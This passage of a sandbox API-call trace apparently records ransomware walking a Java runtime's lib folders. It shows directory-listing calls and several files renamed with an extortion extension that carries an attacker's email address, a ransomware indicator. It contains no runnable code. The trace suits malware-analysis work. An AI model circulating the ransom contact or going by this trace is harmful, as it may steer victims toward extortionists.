dwReserved0=0x0, dwReserved1=0x0, cFileName="fontconfig.properties.src", cAlternateFileName="FONTCO~1.SRC")) returned 1 [0179.592] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa122f229, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fonts", cAlternateFileName="")) returned 1 [0179.592] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.592] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fonts\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa122f229, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2d18 [0179.593] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa122f229, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.593] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x12588, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LucidaBrightDemiBold.ttf", cAlternateFileName="LUCIDA~1.TTF")) returned 1 [0179.593] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x12574, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LucidaBrightDemiItalic.ttf", cAlternateFileName="LUCIDA~2.TTF")) returned 1 [0179.593] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x13bd8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LucidaBrightItalic.ttf", cAlternateFileName="LUCIDA~3.TTF")) returned 1 [0179.593] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5434c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LucidaBrightRegular.ttf", cAlternateFileName="LUCIDA~4.TTF")) returned 1 [0179.593] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4d9c8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LucidaSansDemiBold.ttf", cAlternateFileName="LU38C7~1.TTF")) returned 1 [0179.594] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xaa77c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LucidaSansRegular.ttf", cAlternateFileName="LU761B~1.TTF")) returned 1 [0179.594] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x39254, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LucidaTypewriterBold.ttf", cAlternateFileName="LUE73B~1.TTF")) returned 1 [0179.594] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3b40c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LucidaTypewriterRegular.ttf", cAlternateFileName="LUDBAB~1.TTF")) returned 1 [0179.594] FindNextFileW (in: hFindFile=0x43a2d18, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3b40c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LucidaTypewriterRegular.ttf", cAlternateFileName="LUDBAB~1.TTF")) returned 0 [0179.594] FindClose (in: hFindFile=0x43a2d18 | out: hFindFile=0x43a2d18) returned 1 [0179.595] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.595] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x368a, dwReserved0=0x0, dwReserved1=0x0, cFileName="hijrah-config-umalqura.properties", cAlternateFileName="HIJRAH~1.PRO")) returned 1 [0179.595] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa12313ee, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0179.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.595] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa12313ee, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2cd8 [0179.595] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa12313ee, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.595] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cursors", cAlternateFileName="")) returned 1 [0179.595] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x44750c0 [0179.596] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\*", lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x43a2b18 [0179.597] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.597] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0x0, dwReserved1=0x0, cFileName="cursors.properties", cAlternateFileName="CURSOR~1.PRO")) returned 1 [0179.597] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x343e6a7, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x343e6a7, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x343e6a7, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0x0, dwReserved1=0x0, cFileName="invalid32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="INVALI~1.BAT")) returned 1 [0179.597] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x343e6a7, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x343e6a7, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x343e6a7, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="win32_CopyDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WIN32_~1.BAT")) returned 1 [0179.597] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3464e04, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x3464e04, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x3464e04, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x1a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="win32_CopyNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WIN32_~2.BAT")) returned 1 [0179.597] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3464e04, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x3464e04, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x3b8b0e8, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="win32_LinkDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WIN32_~3.BAT")) returned 1 [0179.597] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x348a23a, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x348a23a, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x348a23a, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x1a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="win32_LinkNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WIN32_~4.BAT")) returned 1 [0179.597] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34d6650, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x34d6650, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x34d6650, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x1a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="win32_MoveDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WI49BB~1.BAT")) returned 1 [0179.598] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34d6650, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x34d6650, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x34d6650, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x1a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="win32_MoveNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WI42D6~1.BAT")) returned 1 [0179.598] FindNextFileW (in: hFindFile=0x43a2b18, lpFindFileData=0x339ee10 | out: lpFindFileData=0x339ee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34d6650, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x34d6650, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x34d6650, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x1a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="win32_MoveNoDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="WI42D6~1.BAT")) returned 0 [0179.598] FindClose (in: hFindFile=0x43a2b18 | out: hFindFile=0x43a2b18) returned 1 [0179.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x44750c0 | out: hHeap=0x680000) returned 1 [0179.598] FindNextFileW (in: hFindFile=0x43a2cd8, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cursors", cAlternateFileName="")) returned 0 [0179.598] FindClose (in: hFindFile=0x43a2cd8 | out: hFindFile=0x43a2cd8) returned 1 [0179.598] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.599] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx.properties", cAlternateFileName="JAVAFX~1.PRO")) returned 1 [0179.599] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8e40a9d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8e40a9d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8e66d0e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe6827, dwReserved0=0x0, dwReserved1=0x0, cFileName="javaws.jar", cAlternateFileName="")) returned 1 [0179.599] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1c6de, dwReserved0=0x0, dwReserved1=0x0, cFileName="jce.jar", cAlternateFileName="")) returned 1 [0179.599] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1295634, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfr", cAlternateFileName="")) returned 1 [0179.599] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfffe) returned 0x43f50a0 [0179.599] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr\\*", lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1295634, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x43a2998 [0179.599] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1295634, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0179.599] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e8d, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="default.jfc", cAlternateFileName="")) returned 1 [0179.599] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e61, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="profile.jfc", cAlternateFileName="")) returned 1 [0179.599] FindNextFileW (in: hFindFile=0x43a2998, lpFindFileData=0x339f08c | out: lpFindFileData=0x339f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e61, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="profile.jfc", cAlternateFileName="")) returned 0 [0179.599] FindClose (in: hFindFile=0x43a2998 | out: hFindFile=0x43a2998) returned 1 [0179.606] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x43f50a0 | out: hHeap=0x680000) returned 1 [0179.606] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x88dc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfr.jar", cAlternateFileName="")) returned 1 [0179.607] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x848c, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfxswt.jar", cAlternateFileName="")) returned 1 [0179.607] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa76f896, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xaa76f896, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xaa76f896, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8eb80, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsse.jar", cAlternateFileName="")) returned 1 [0179.607] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34b0407, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x34b0407, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x356f00e, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x117e, dwReserved0=0x0, dwReserved1=0x0, cFileName="jvm.hprof.txt.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="JVMHPR~1.BAT")) returned 1 [0179.607] FindNextFileW (in: hFindFile=0x43a29d8, lpFindFileData=0x339f308 | out: lpFindFileData=0x339f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, 